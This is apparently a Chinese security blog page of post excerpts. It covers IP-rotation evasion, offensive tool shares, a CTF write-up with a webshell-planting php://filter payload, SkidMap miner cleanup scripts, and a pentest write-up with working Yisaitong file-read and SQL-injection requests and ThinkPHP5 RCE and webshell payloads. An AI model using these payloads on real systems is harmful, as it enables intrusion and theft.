Clash 的轮询代理机制,以下是常见的隐藏真实 IP 手段,适用于不同攻防场景:移动网络切换通过开启/关闭飞行模式或重新启用手机流量,获取新的公网动态 IP,适用于移动端或笔记本热点环境。优点:快速低成本切换缺点:依赖运营商分配动态 IP,速度受限拔插网卡重拨在宽带环境中,通过禁用/启用网卡或拔插网线,触发重新拨号获取新 IP(前提是动态拨号)。优点:操作简单,适合家庭网络缺点:频繁切换可能无效,部分地区为固定 IP公网代理池使用公开或自建的高匿代理列表,通过程序自动轮询切换,适合大规模扫描和爆破任务。优点:适用于并发、分布式请求缺点:不稳定,部分代理已被目标封禁VPN / 云主机节点轮换租用多个 VPS 或使用支持节点切换的商业 VPN,实现按需更换出口 IP。优点:稳定高效,适合重度任务缺点:成本较高,配置复杂Tor / I2P 等匿名网络借助多层加密路由隐藏真实地址,适用于需要高度匿名的通信或探测行为。优点:匿名性强缺点:延迟高,无法满足高频请求需求云函数中转利用 Cloudflare Workers、腾讯云函数、Vercel 等平台搭建中转代理,将请求伪装为云服务出口流量。优点:隐蔽性强,易于绕过封禁缺点:平台限流,需一定配置经验
2025年05月28日
921 阅读
3 评论
52 点赞
2025-05-20
【工具分享】Katana + EZ 自动化漏洞打点
今日分享Katana 是由 ProjectDiscovery 团队开发的开源命令行 Web 爬虫工具,采用 Go 语言编写,具备高性能、强定制、易集成等特点,专为安全研究、渗透测试与自动化平台设计。它支持静态链接抓取和 JavaScript 动态内容解析,可深入单页应用(SPA)提取隐藏接口、动态 URL 与表单字段,同时具备字段提取、代理支持、多模式运行(标准/无头浏览器)等能力。Katana 输出格式友好,支持 JSON 与标准流,便于与 nuclei、httpx、ez 等工具联动,构建自动化漏洞打点流程。工具联动我比较推荐这种组合方式:Katana + ez,先通过 Katana 获取爬虫数据,再交由 ez 去验证漏洞,整体流程更全面也更自动化。推荐理由: Katana:快速、高效,支持 JS 解析和字段提取,能发现隐藏路径、API 接口。ez:专注于漏洞验证,适合对爬取结果做进一步测试与利用。ez webscan先启动 ez 的被动扫描。Katana -list urls.txt -proxy http://127.0.0.1:2222利用 Katana 爬取出的数据代理转发给 ez 进行漏洞扫描。工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🕷️ Katana 爬虫引擎 由 ProjectDiscovery 团队打造的命令行 Web 爬虫工具,支持 JS 渲染、动态内容识别与字段提取,适用于漏洞挖掘与自动化信息收集。 立即前往 GitHub 下载 Katana
2025年05月20日
745 阅读
0 评论
56 点赞
2025-05-19
【工具分享】EZ 工具 主动+被动一站搞定
今日分享 EZ 是由 M-SEC 社区开发的一款跨平台漏洞扫描器,专为渗透测试和安全评估设计。它集成了信息收集、端口扫描、服务爆破、URL 爬虫、指纹识别和被动扫描等多种功能,能够帮助安全专家发现常见的网络漏洞。核心功能信息收集与指纹识别:识别目标系统的操作系统、服务和应用程序等信息。端口扫描与服务爆破:检测开放端口并尝试破解常见服务的认证。URL 爬虫与被动扫描:自动爬取网站链接,进行漏洞检测。漏洞检测:支持检测 SQL 注入、XSS、XXE、SSRF 等常见漏洞。内置 POC 支持:集成了 Apache Shiro、RabbitMQ、Struts2 等组件的漏洞检测。Web 界面操作:提供图形化界面,方便用户进行任务管理和结果查看。使用方法下载与安装:从 GitHub 或 M-SEC 社区获取 EZ 工具的二进制文件。证书申请:注册 M-SEC 社区账号,并在个人中心申请证书(有效期为一个月)。启动工具:将证书放置于 EZ 工具目录下,使用命令行启动,如:ez webscan -u http://example.comWeb 界面:通过命令 ez web 启动 Web 界面,进行可视化操作。被动扫描:监听本地代理流量进行被动扫描,命令如下:ez webscan工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🚀 EZ 漏洞扫描器 多功能漏洞扫描器,支持信息收集、端口扫描、服务爆破、URL 爬虫与指纹识别,适用于渗透测试与红队评估。 立即前往 GitHub 下载 EZ
2025年05月19日
524 阅读
0 评论
47 点赞
2025-05-18
【工具分享】密探工具,渗透起手第一步
今日分享密探是一款面向红队实战与SRC挖掘场景的多功能渗透测试工具,整合了信息收集、资产测绘、漏洞探测、弱口令破解、接口抓取等核心功能,旨在帮助网络安全学习者和从业者快速上手实战渗透流程。核心亮点全流程覆盖:集成信息收集、资产测绘、目录扫描、接口探测、弱口令爆破等模块,覆盖红队与SRC实战关键环节。多引擎资产测绘:支持 FOFA、Hunter、Quake、ZoomEye、零零信安等平台的数据查询、聚合导出与联动扫描。子域名递归爆破:具备高效的子域名爆破能力,支持多级递归与 title/title\_hash 获取,并内置聚合查询接口。文件与备份扫描:支持通配目录扫描、自定义字典、备份文件识别、Spring 漏洞路径等常见弱点探测。指纹识别联动:自动识别网站指纹,并可联动敏感信息、接口、路径模块,辅助精准定位攻击面。弱口令批量检测:内置多种服务协议(MySQL、Redis、SSH、Socks5等)弱口令爆破功能,支持测绘数据联动爆破。敏感接口探测:整合 Swagger 接口抓取与未授权调用检测,自动识别高危 HTTP 方法与 API 返回数据。工具箱辅助功能:包含 JWT 爆破、SessionKey 加解密、社工字典生成器、搜索语法生成器等实用渗透辅助工具。渗透备忘录体系:集成 Markdown 编辑器,支持自定义知识路线与模块目录,适合记录实战经验与技巧笔记。可视化交互体验:提供统一皮肤、历史记录缓存、右键操作、状态高亮等丰富 UI 细节,提升渗透测试操作流畅度。子域挖掘资产测绘批量权重网站导航常见问题JavaFX 报错:Java 11 及以上版本需手动下载 JavaFX SDK 并配置模块路径,建议优先使用 JDK 8。界面乱码问题:运行程序时添加 -Dfile.encoding=UTF-8 启动参数,可避免中文乱码。ZoomEye 查询失败:普通账户每日查询额度有限,建议关注官方公众号获取积分或升级为高级会员。程序无法启动或闪退:请确认本地环境为 JDK 8,优先使用 GitHub 官方版本运行,避免第三方打包问题。工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🚀 密探渗透测试工具 多功能渗透测试工具,适用于红队、SRC、安全研究,支持信息收集、测绘、扫描与爆破。 立即前往 GitHub 下载密探
2025年05月18日
356 阅读
0 评论
50 点赞
2025-05-17
【工具分享】AssetSpy 客户端内存资产捕手
今日分享AssetSpy 是一款专为红队实战设计的客户端内存扫描工具,支持UTF-8 / UTF-16 双编码识别,可通过进程名或 PID 定位目标应用,实时扫描其内存区域,精准提取出 URL 资源链接和域名信息,广泛适用于渗透测试、逆向分析、动态调试等场景中对客户端通信行为的资产还原。核心亮点多线程高性能:支持多进程并发扫描,结合 KMP 字符串搜索算法与分块优化,极大提升内存扫描效率。精准内存识别:可读取并分析 MEM_PRIVATE、MEM_IMAGE、MEM_MAPPED 三类内存区域,定位潜在资产位置。双编码全面提取:自动识别并解析 UTF-8 / UTF-16 编码,确保不遗漏任意 URL 数据。URL/域名智能去重:提取的 URL 与域名自动去重,防止重复记录,提升数据质量。分块扫描+页级去重:每次按 1MB 块读取,结合页级地址标记,防止重复访问内存区域。关键词精准命中:支持配置关键词(如 tt.com、api.xx.com),精准提取目标资产相关链接。实时监控模式:支持持续监听进程内存变化(-t 参数开启),实现资产实时捕获。结果自动输出:自动将扫描结果输出至 urls.txt 和 domains.txt,便于后续分析或导入其他工具。可视化终端输出:控制台支持彩色 Logo 与格式化结果输出,增强阅读体验与演示效果。实时监控简单演示除了提取程序中已存在的 URL,AssetSpy 还支持从运行时新分配的内存区域中识别动态生成的 URL。测试价值可发现调试/测试接口、上线域名、回调地址等关键资产;特别适合用于HTTPS 抓包失败、代码混淆程序加壳、动态拼接等绕过场景;是常规抓包/逆向手段之外的重要辅助方法,提升资产发现的全面性。暂不提供增强版,测试版可能有BUG,但不影响使用。工具下载 .link-block { display: flex; align-items: center; justify-content: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; cursor: pointer; transition: background 0.2s ease; } .link-block:hover { background-color: #e0e0e0; } .link-block svg { width: 20px; height: 20px; fill: currentColor; margin-right: 12px; } 🚀 AssetSpy 内存资产捕手 红队辅助工具,专注于扫描客户端内存并提取 URL 与域名,用于通信还原与敏感资产发现。 立即下载 AssetSpy(测试版)
2025年05月17日
391 阅读
0 评论
65 点赞
2025-05-16
【工具分享】TscanPlus 红队侦察自动化武器
今日分享无影(TscanPlus)是一款功能强大的网络安全检测与运维工具,专为资产测绘、漏洞挖掘和自动化渗透测试打造,适用于企业安全建设、红队作战以及安全运维等场景,是一款优秀的渗透测试工具。核心亮点综合能力强:集成端口扫描、服务识别、URL指纹识别、目录探测、弱口令破解、POC检测、域名枚举、空间测绘、URLFinder 等模块,覆盖从资产发现到漏洞利用的全链路。高效识别指纹:内置 5.2 万+ 指纹规则,1 万个网站指纹识别仅需 8-10 分钟,效率业内领先。自动化联动检测:支持指纹与 POC 关联,发现目标后自动触发密码破解或漏洞验证。POC系统强大:内置高质量 POC,支持接入 Nuclei、Xray、Afrog 等工具,按指纹结果自动匹配并执行。红队功能丰富:集成反弹 shell、CS上线命令、下载命令、WebShell、内网命令、权限维持等实战指令。辅助工具齐全:涵盖编码解码、加解密、JWT破解、Host碰撞、40x绕过、资产分拣、提权辅助、默认口令查询等。跨平台支持:基于 Go + Wails 构建,支持 Windows / Mac / Linux,UI 界面直观易用。工具说明适用于渗透测试工程师、安全运营人员、红队成员、甲方安全团队等,尤其适合在实战测试中进行快速资产识别与漏洞验证。端口扫描漏洞验证工具下载 .link-block { display: flex; align-items: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; transition: none; } .link-block:hover { background-color: #f3f4f6; box-shadow: none; } 🚀 TscanPlus 工具地址 高效实用的网络资产探测与漏洞挖掘工具,由 TideSec 团队开发。 立即前往 GitHub 下载 TscanPlus
2025年05月16日
513 阅读
0 评论
44 点赞
2025-05-15
【工具分享】XSStrike 智能化 XSS 挖掘工具
今日分享XSS 攻击是一种常见的网页漏洞利用方式,攻击者通过注入恶意脚本,使用户在不知情的情况下执行有害代码,进而实现信息窃取、身份冒用等攻击。目前常见的 XSS 扫描工具有 NoXss、XSSFORK、xwaf 等,今天给大家分享的是一款更智能、功能更强大的工具——XSStrike。相比于 xwaf,XSStrike 最大的优势在于内置了强大的 Payload 自动生成器,对于从事渗透测试和红队攻防的师傅们来说,非常实用。同时它还支持高效的爬虫功能、模糊测试、WAF 检测等,整体使用体验甚至让人联想到 xray,在引擎强度和智能化方面,XSStrike 更胜一筹,是一款值得推荐的实战利器。Payload工具下载 .link-block { display: flex; align-items: center; padding: 14px 20px; border-radius: 12px; background-color: #f3f4f6; text-decoration: none; color: #111; font-weight: 500; transition: none; } .link-block:hover { background-color: #e5e7eb; box-shadow: none; } 🚀 XSStrike XSS 扫描工具 一款基于 Python 编写的强大 XSS 渗透测试工具,支持 payload 自动生成、模糊测试和 WAF 检测。 立即前往 GitHub 下载 XSStrike
2025年05月15日
156 阅读
0 评论
24 点赞
2024-05-14
【CTF解题】2024年浙江省CTF网络安全竞赛
留言随缘更新,只公布解题结果,太懒了。。。Reverse模拟人生{collapse}{collapse-item label="伪C代码" close}unsigned __int64 __fastcall sub_40350F(int a1, int a2, int a3, int a4, int a5) { __int64 v5; // rbx int *v6; // rdx int v11; // [rsp+20h] [rbp-F0h] int i; // [rsp+24h] [rbp-ECh] __int64 v13; // [rsp+28h] [rbp-E8h] int v14[8]; // [rsp+30h] [rbp-E0h] int v15[42]; // [rsp+50h] [rbp-C0h] BYREF unsigned __int64 v16; // [rsp+F8h] [rbp-18h] v16 = __readfsqword(0x28u); v13 = a1; v11 = 0; v14[0] = a2; v14[1] = a3; v14[2] = a4; v14[3] = a5; while ( v11 <= 3 ) { v5 = v13 * v14[v11]; v13 = v5 / (int)sub_4034E1((unsigned int)v13, (unsigned int)v14[v11++]); } if ( a2 > 0 && a3 > 0 && a4 > 0 && a5 > 0 && a1 == 60 && v13 == 286395540 ) { v6 = v15; memset(v15, 0, 0xA0uLL); v15[0] = 432; v15[1] = 408; v15[2] = 429; v15[3] = 438; v15[4] = 452; v15[5] = 246; v15[6] = 243; v15[7] = 417; v15[8] = 423; v15[9] = 444; v15[10] = 236; v15[11] = 231; v15[12] = 203; v15[13] = 447; v15[14] = 227; v15[15] = 435; v15[16] = 252; v15[17] = 224; v15[18] = 204; v15[19] = 443; v15[20] = 419; v15[21] = 248; v15[22] = 442; v15[23] = 241; v15[24] = 203; v15[25] = 251; v15[26] = 445; v15[27] = 239; v15[28] = 441; v15[29] = 254; v15[30] = 444; v15[31] = 246; v15[32] = 203; v15[33] = 245; v15[34] = 255; v15[35] = 445; v15[36] = 434; v15[37] = 478; for ( i = 0; v15[i]; ++i ) std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)(char)((v15[i] >> 2) ^ 0xA), v6); } return __readfsqword(0x28u) ^ v16; }{/collapse-item}{/collapse}以上是sub_40350F函数内的代码,不难看出v15存储的就是做过处理的flag,关键就是 v15[i] >> 2 ^ 0xa,我们就模仿它写个脚本解下,就能拿到最终的flag。v15 = [ 432, 408, 429, 438, 452, 246, 243, 417, 423, 444, 236, 231, 203, 447, 227, 435, 252, 224, 204, 443, 419, 248, 442, 241, 203, 251, 445, 239, 441, 254, 444, 246, 203, 245, 255, 445, 434, 478 ] for num in v15: result = chr((num >> 2) ^ 0xA) print(result, end='')Webyc2_web1<?php highlight_file(__FILE__); error_reporting(0); function waf01($x){ if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log/i',$x)){ die('You are hacker!!! No!!!'); } } $file=$_GET['file']; $contents=$_GET['contents']; waf01($file); file_put_contents($file, "<?php die();?>".$contents);GET: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php&contents=?<hp pe@av(l_$OPTSa[aa]a;)>? POST: aaaa=system("tac flag.php");先GET请求下这个时候木马就被写入到服务器里了,然后POST提交就能获取到flag。综合渗透1这题要进后台先找打后台,然后账号密码爆破,账号密码 admin/admin第一题是有提示,第二题flag:在home综合渗透1-2<?php fwrite(fopen('shell.php','w'),'<?php eval($_POST["pass"]);?>');?>前端找可执行php代码的地方,写入一句话木马。第三个flag,在第二题有提示:在数据库。综合渗透1-3这样就都找到了。Crypto...Misc伪加密找到 14 00 09 这段改成 14 00 00 保存,即可解zip压缩包伪加密。地狱模式题目是一个jar文件,玩游戏坚持一分钟就给你flag,这里直接反编译下取flag。打篮球之前先找到flag吧压缩包里是一个ELF文件,我直接用strings 过滤下flag,直接就拿到了。这是sql盲注嘛?直接用http对象列表查看,字节大小定位返回内容,这里我已经确定 21 bytes 是成功的,那么排序下找盲注的数字,数字ASCII转换字符拼接就是flag了。...
2024年05月14日
778 阅读
0 评论
8 点赞
2023-12-28
【技术分享】Linux SkidMap 挖矿病毒处置
简介初步处理,待更新...工具分享这里分享个几个应急响应工具, 这里我用 toybox ,来查找恶意程序,再分享一个排查工具 GScan。我把 toybox 这个工具上传到 /usr/bin 文件夹里,方便任意位置调用,它和 busybox 功能一样,那为什么不用 busybox?因为被恶意程序禁用掉了。检查项{collapse}{collapse-item label="排查内容" close}/etc/passwd /var/spool/cron/* /etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /etc/anacrontab /var/spool/anacron/* /var/log/auth.log /var/log/syslog /var/log/messages /var/log/secure /var/log/audit/audit.log /var/log/boot.log /var/log/kern.log /var/log/httpd/ /var/log/mysql/ /var/log/dmesg /var/log/btmp /var/log/lastlog /var/log/wtmp /var/log/utmp{/collapse-item}{collapse-item label="排查命令" close}# 建议配合busybox或toybox来执行系统命令,避免文件被恶意程序劫持和替换。 top iftop ps -elf | grep <keyword> netstat -anop ss who -m awk -F: '($3==0)' /etc/passwd find / -name <keyword> cat ls{/collapse-item}{/collapse}查找异常tobybox top通过 toybox 定位到可疑进程占用大量CPU,重启后 gettexted 后缀会随机变化,它是挖矿的主程序。它有潜伏期现在是没挖矿状态,但后面跟着一堆可疑程序,通过计算哈希值提交给VT与微步,发现是有问题的。system.pubgettexted.psscn疑似多个命令文件被恶意程序给劫持,通过 ps、ls 发现并不能找到恶意程序,而用toybox来执行却能找到。review通过VT查找可以看到程序的可以行为,并编写了清除恶意程序的 bash 脚本。清除代码1#!/bin/bash processes=("gettexted.*" "postmaped.*" "matchpathcond.*" "postcated.*" "telinited.*" "devlinked.*") for process in "${processes[@]}"; do echo "$process" toybox pkill -f "$process" done # 清理文件 files=( "/etc/init.d/dns-udp4" "/etc/profile.d/gateway.sh" "/.mod" "/etc/.cfg" "/boot/system.pub" "/etc/profile.d/bash.cfg" "/lib/system.mark" "/usr/lib/libgdi.so.0.8.2" "/usr/sbin/netstat.cfg" "/etc/profile.d/bash.cfg.sh" ) cleanup_file() { local file="$1" toybox rm -rf "$file" toybox echo -n > "$file" toybox chmod 000 "$file" chattr +i "$file" } cleanup_files() { local files=("$@") for file in "${files[@]}"; do cleanup_file "$file" done } cleanup_files "${files[@]}" # 系统加固 toybox echo 32768 > /proc/sys/kernel/pid_max toybox echo 0 > /proc/sys/kernel/ns_last_pid toybox rm -rf /usr/bin/review toybox rm -rf /usr/bin/gettexted* toybox rm -rf /usr/bin/biosdecoded* toybox rm -rf /usr/bin/devlinked* toybox rm -rf /usr/bin/telinited* toybox rm -rf /usr/bin/postcated* toybox rm -rf /usr/bin/matchpathcond* toybox rm -rf /usr/bin/postmaped* toybox rm -rf /usr/bin/mldconfig systemctl enable kdump.service systemctl restart ssh清除代码2#!/bin/bash rm -rf /etc/init.d/dns-udp4 rm -rf /etc/profile.d/gateway.sh sed -i '/\/usr\/sbin\/netstat.cfe/d' /etc/rc.d/rc.local sed -i '/\*\/1 \* \* \* \* root \/\.mod/d' /etc/crontab sed -i '/\/lib\/system.mark/d' /etc/rc.d/init.d/network echo -n >/.mod echo -n > /etc/.cfg echo -n > /boot/system.pub echo -n > /etc/profile.d/bash.cfg echo -n > /lib/system.mark echo -n > /usr/lib/libedi.so.8.8.2 echo -n > /usr/sbin/netstat.cfg echo -n > /etc/profile.d/bash.cfg.sh echo -n > /etc/selinux/config echo -n > /dev/null rm -rf /etc/selinux/targeted/tmp/modules/100/ chmod 000 /.mod /etc/.cfg /bot/system.pub /etc/profile.d/bash.cfg /lib/system.mark /usr/lib/libgdi.so.0.8.2 /usr/sbin/metstat.cfg /etc/profile.d/bash.cfg.sh chmod +i /.mod /etc/.cfg /bot/system.pub /etc/profile.d/bash.cfg /lib/system.mark /usr/lib/libgdi.so.0.8.2 /usr/sbin/metstat.cfg /etc/profile.d/bash.cfg.sh ###替换被篡改的文件 ./toybox-x86_64 cp -f ./agetty /usr/bin/agetty ./toybox-x86_64 cp -f ./tty /usr/bin/tty ./toybox-x86_64 cp -f ./ssh /usr/bin/ssh ./toybox-x86_64 cp -f ./scp /usr/bin/scp ./toybox-x86_64 cp -f ./umount /usr/bin/umount sed -i '/auth[[:space:]]\+sufficient[[:space:]]\+pam_sftp\.so/d' /etc/pam.d/sshd sed -i '/auth[[:space:]]\+sufficient[[:space:]]\+pam_sftp\.so/d' /etc/pam.d/su sed -i '/auth[[:space:]]\+sufficient[[:space:]]\+pam_sftp\.so/d' /etc/pam.d/sudo if [ $? -eq 0 ]; then echo "命令执行成功。" else echo "命令执行失败。" fi待分析...
2023年12月28日
397 阅读
0 评论
28 点赞
2023-11-21
【技术分享】记一次内外网牛马渗透测试
Web渗透(外网)垂直越权可以发现前端登录存在两种模式,管理员与用户还有注册用户,这个时候我们可以先注册用户进去看看是什么样子的。这是我注册的普通用户,里面没有管理员权限的功能。这里我随便输入了一个错误的管理员账号密码,我的思路是先抓取我注册的用户,登录成功的响应包再进行替换错误的管理员返回的响应包,直接放行就能登录进去。这个是我注册的用户登录成功的响应包,这里进行复制保留,然后再登录错误的管理员账户,将我登录成功的响应数据替换到管理员响应包里即可。这样就进来了,在后台查询用户接口中其实还存在sql注入。SQL注入可以发现重发修改 sort=' 的时候直接爆出sql语句错误,说明这个参数存在sql注入。直接上sqlmap一把梭。未授权访问前端接口暴露,存在未经授权,可获取到大量个人敏感信息,包括个人姓名、手机号地址等等。访问将设置登录状态,http://xxx.xxx.xxx/permission/loginByOutside 再访问主页就登录成功了。亿赛通系统打一波ndayViewUploadFile任意文件读取GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:/Windows/System32/drivers/etc/hosts&uploadFileId=1&fileName1=hosts HTTP/1.1 Host: xxx.xxx.xxx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=5BEE0014C9CD691F3177A3194EB06C3F Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflatecreate SmartSec信息泄露https://xxx.xxx.xxx/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sqlUploadFileToCatalog SQL注入POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1 Host: xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded id=1FileFormatAjax SQL注入POST /CDGServer3/PerOrgServlet/../FileFormatAjax HTTP/1.1 Host: xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded command=delFileFormat&fileFormatId=12SaveCDGPermissionFromGFOA SQL注入POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1 Host: xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded fileId=1PolicyAjax 前台SQL注入POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1 Host: xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded command=selectOption&id=1HookInvalidCourse SQL注入POST /CDGServer3/system/HookInvalidCourse;loginService HTTP/1.1 Host: xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded command=DelHookInvalidCourse&id=1Web渗透(内网)资产收集开始工作,我用Goby对内网进行资产探测,网段比较大,例子也比较形象,就单个作为文章的记录了。弱口令逮到几个弱口令,内网中弱口令最多了,记得上次有10多个弱口令。。。Thinkphp5 RCE命令执行看图片识框架,这不是Thinkphp吗,果断用工具跑一遍payload。果不其然存在RCE命令执行,直接上payload看看。/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoam运气还不错,歪打正着,看看是个什么权限,是 system 耶,emm... 很棒!文件包含?s=index/\think\Lang/load&file=C:\windows\write.exe写入小马?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST['cmd']); > 1.php哈哈哈,直接写个shell用蚁剑连接上,好了点到为止。懒得哔哔 : )目录泄露没啥好说的,没啥用。。。
2023年11月21日
549 阅读
0 评论
12 点赞
1
2
...
4
0:00